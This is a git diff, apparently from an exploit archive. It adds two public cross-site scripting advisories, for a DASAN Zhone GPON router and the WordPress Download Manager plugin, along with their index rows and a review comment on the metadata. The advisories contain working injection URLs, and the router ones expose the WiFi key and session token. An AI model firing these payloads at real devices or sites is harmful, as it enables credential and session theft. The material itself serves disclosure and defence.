diff --git a/exploits/hardware/webapps/47351.txt b/exploits/hardware/webapps/47351.txt
new file mode 100644
index 000000000..5b93d4dfc
--- /dev/null
+++ b/exploits/hardware/webapps/47351.txt
@@ -0,0 +1,40 @@
+Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters.
+
+# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU
+
+# Date: 31.03.2019
+
+# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl
+
+# Vendor Homepage: https://dasanzhone.com
+
+# Version: <= S3.1.285
+
+# Alternate Version: <= S3.0.738
+
+# Tested on: version S3.1.285 (alternate version S3.0.738)
+
+# CVE : CVE-2019-10677
+
+
+= Reflected Cross-Site Scripting (XSS) =
+
+http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp
+
+
+= Stored Cross-Site Scripting (XSS) =
+
+* WiFi network plaintext password
+
+http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
+
+http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
+
+* CSRF token
+
+http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//
+
+
+= Clickjacking =
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/47350.txt b/exploits/php/webapps/47350.txt
new file mode 100644
index 000000000..b8a90333b
--- /dev/null
+++ b/exploits/php/webapps/47350.txt
@@ -0,0 +1,47 @@
+* Exploit Title: WordPress Download Manager Cross-site Scripting
+* Discovery Date: 2019-04-13
+* Exploit Author: ThuraMoeMyint
+* Author Link: https://twitter.com/mgthuramoemyint
+* Vendor Homepage: https://www.wpdownloadmanager.com
+* Software Link: https://wordpress.org/plugins/download-manager
+* Version: 2.9.93
+* Category: WebApps, WordPress
+CVE:CVE-2019-15889
+Description
+--
+
+In the pro features of the WordPress download manager plugin, there is
+a Category Short-code feature witch can use to sort categories with
+order by a function which will be used as ?orderby=title,publish_date
+.
+By adding parameter "> and add any XSS payload , the xss payload will execute.
+
+To reproduce,
+
+1.Go to the link where we can find ?orderby
+2.Add parameters >” and give simple payload like
+3.The payload will execute.
+--
+
+PoC
+--
+
+
+
+--
+Demo
+--
+https://server/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc
+--
+
+
+Another reflected cross-site scripting via advance search
+
+https://server/wpdmpro/advanced-search/
+
+https://server/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 86c580d5c..1784de6ed 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -41702,3 +41702,5 @@ id,file,description,date,author,type,platform,port
 47340,exploits/multiple/webapps/47340.txt,"Alkacon OpenCMS 10.5.x - Local File inclusion",2019-09-02,Aetsu,webapps,multiple,
 47343,exploits/php/webapps/47343.txt,"Craft CMS 2.7.9/3.2.5 - Information Disclosure",2019-09-02,"Mohammed Abdul Raheem",webapps,php,
 47349,exploits/php/webapps/47349.txt,"FileThingie 2.5.7 - Arbitrary File Upload",2019-09-03,cakes,webapps,php,
+47350,exploits/php/webapps/47350.txt,"WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting",2019-09-04,MgThuraMoeMyint,webapps,php,80
+47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80
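Review bot: The author field of the new 47350 row is `MgThuraMoeMyint`, but the advisory file added in the same commit states `Exploit Author: ThuraMoeMyint`, so an index search by author will not match the file header; one of the two should be aligned. Both new rows also set the port column to `80`, while the three context rows leave it empty and the 47350 sample URLs use `https://`, so the value should either be confirmed or left empty as in the neighbouring web-app rows. Neither description carries the CVE id given in the files (`CVE-2019-15889`, `CVE-2019-10677`); if the index is used for triage, appending it to the description, or to whatever alias mapping the project keeps, would let defenders find the entries by CVE.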